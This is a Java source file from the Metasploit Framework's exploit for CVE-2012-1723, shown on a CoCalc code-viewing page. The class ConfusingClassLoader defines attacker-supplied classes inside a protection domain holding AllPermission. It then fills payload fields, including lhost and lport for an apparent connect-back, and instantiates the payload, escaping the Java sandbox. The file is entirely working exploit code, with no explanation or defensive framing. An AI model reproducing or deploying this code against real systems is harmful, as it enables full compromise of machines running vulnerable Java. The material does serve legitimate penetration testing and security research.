CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2012-1723/src/cve1723/ConfusingClassLoader.java
Views: 11785
1
package cve1723;

2


3
import java.lang.reflect.Field;

4
import java.net.URL;

5
import java.security.*;

6
import java.security.cert.*;

7
import java.security.cert.Certificate;

8
import java.util.Enumeration;

9


10
/**

11
 * Call the protected method

12
 */

13
public class ConfusingClassLoader extends ClassLoader {

14


15
	public static void defineAndCreate(final ConfusingClassLoader cl, final String name[], final byte data[][], final String hexdata, final String jar, final String lhost, final int lport) {

16
		try {

17
			final Permissions p = new Permissions();

18
			p.add(new AllPermission());

19
			final ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, new Certificate[0]), p);

20


21
			final Class<?> clazz = cl.defineClass(name[0], data[0], 0, data[0].length, pd);

22
			cl.defineClass(name[1], data[1], 0, data[1].length, pd);

23


24
			final Field payload_data = clazz.getField("data");

25
			final Field payload_jar = clazz.getField("jar");

26
			final Field payload_lhost = clazz.getField("lhost");

27
			final Field payload_lport = clazz.getField("lport");

28


29
			payload_data.set(null, hexdata);

30
			payload_jar.set(null, jar);

31
			payload_lhost.set(null, lhost);

32
			payload_lport.set(null, lport);

33


34
			clazz.newInstance();

35
		} catch (final Exception e) {

36
			// swallow

37
			e.printStackTrace();

38
		}

39
	}

40
}

41


42